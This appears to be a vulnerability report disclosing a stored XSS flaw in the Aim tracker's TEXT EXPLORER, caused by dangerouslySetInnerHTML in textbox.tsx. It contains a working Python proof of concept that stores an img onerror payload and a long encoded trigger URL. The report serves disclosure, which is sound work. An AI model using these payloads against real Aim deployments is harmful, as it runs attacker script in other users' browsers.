Description

credit：Aftersnows@360 Vulnerability Research Institute

In the textbox.tsx file, the dangerouslySetInnerHTML function from React is used, which can display the text in this area and potentially cause an XSS attack.

Proof of Concept

Through analysis, it can be discovered that there are multiple instances of dangerouslySetInnerHTML being used, not just in the previously logged XSS storage vulnerability, but also within the textbox component.

 [TEXT_RNDERER_MODES.HTML]: (
      <div dangerouslySetInnerHTML={{ __html: text }} />
    ),

By sending this PoC (Proof of Concept) to the target machine.

from aim import Run,Text

run = Run(repo="aim://127.0.0.1:53800",capture_terminal_logs=False)
poc="<img onerror='alert(\\"Hacked!\\");' src='invalid' />"

run.track(Text(poc), name=poc, step=1, epoch=1,context={ "subset": "train" })

Afterwards, by using the HTML text renderer in the TEXT EXPLORER feature, a stored XSS (Cross-Site Scripting) can be triggered.

https://github.com/user-attachments/assets/9b9f5bb9-91ff-410d-8c0b-6b6ac8719828

A user simply needs to access the TEXT EXPLORER query to trigger the XSS attack.

<http://127.0.0.1:43800/text?query=O-JTdCJTIyZm9ybSUyMjolN0IlMjJzaW1wbGVJbnB1dCUyMjolMjIlMjIsJTIyYWR2YW5jZWRJbnB1dCUyMjolMjJ0ZXh0cy5jb250ZXh0LnN1YnNldCUyMD09JTIwJTVDJTIydHJhaW4lNUMlMjIlMjIsJTIyc2VsZWN0aW9ucyUyMjolNUIlN0IlMjJsYWJlbCUyMjolMjIlM0NpbWclMjBvbmVycm9yPSdhbGVydCglNUMlMjJ4c3MlNUMlMjIpOyclMjBzcmM9J2VtcHR5LnBuZyclMjAvJTNFJTIwc3Vic2V0PSU1QyUyMnRyYWluJTVDJTIyJTIyLCUyMmdyb3VwJTIyOiUyMiUzQ2ltZyUyMG9uZXJyb3I9J2FsZXJ0KCU1QyUyMnhzcyU1QyUyMik7JyUyMHNyYz0nZW1wdHkucG5nJyUyMC8lM0UlMjIsJTIya2V5JTIyOiUyMk8tSlRkQ0pUSXliV1YwY21salRtRnRaU1V5TWpvbE1qSWxNME5wYldjbE1qQnZibVZ5Y205eVBTZGhiR1Z5ZENnbE5VTWxNako0YzNNbE5VTWxNaklwT3ljbE1qQnpjbU05SjJWdGNIUjVMbkJ1WnljbE1qQXZKVE5GSlRJeUxDVXlNbU52Ym5SbGVIUk9ZVzFsSlRJeU9pVXlNaVV5TUhOMVluTmxkRDBsTlVNbE1qSjBjbUZwYmlVMVF5VXlNaVV5TWlVM1JBJTIyLCUyMnZhbHVlJTIyOiU3QiUyMm9wdGlvbl9uYW1lJTIyOiUyMiUzQ2ltZyUyMG9uZXJyb3I9J2FsZXJ0KCU1QyUyMnhzcyU1QyUyMik7JyUyMHNyYz0nZW1wdHkucG5nJyUyMC8lM0UlMjIsJTIyY29udGV4dCUyMjolN0IlMjJzdWJzZXQlMjI6JTIydHJhaW4lMjIlN0QlN0QlN0QlNUQsJTIyYWR2YW5jZWRNb2RlT24lMjI6dHJ1ZSwlMjJpc0luaXRpYWwlMjI6ZmFsc2UlN0QsJTIycmFuZ2VzJTIyOiU3QiUyMmlzQXBwbHlCdXR0b25EaXNhYmxlZCUyMjp0cnVlLCUyMmlzVmFsaWQlMjI6dHJ1ZSwlMjJpc0luaXRpYWwlMjI6ZmFsc2UsJTIycmVjb3JkJTIyOiU3QiUyMmRlbnNpdHklMjI6MSwlMjJzbGljZSUyMjolNUIxLDElNUQlN0QsJTIyaW5kZXglMjI6JTdCJTIyZGVuc2l0eSUyMjoxLCUyMnNsaWNlJTIyOiU1QjAsMCU1RCU3RCU3RCU3RA&vis1-c-textRenderer=O-JTdCJTIydHlwZSUyMjolMjJodG1sJTIyJTdE>

Impact

This is a standard stored XSS (Cross-Site Scripting) vulnerability. Once triggered by a user, it can lead to the execution of browser actions.

TEXT EXPLORER is designed for querying and filtering large amounts of text that meet certain criteria. Imagine a normal user wanting to use the TEXT EXPLORER feature to query the content they need, but an attacker injects a large number of XSS payloads into it. The attacker uses different tags (such as name, title, etc., which are all under the attacker's control when sent) for PoC injection. As a result, the user becomes vulnerable to XSS attacks. The impact of this vulnerability is significant.

credit：Aftersnows@360 Vulnerability Research Institute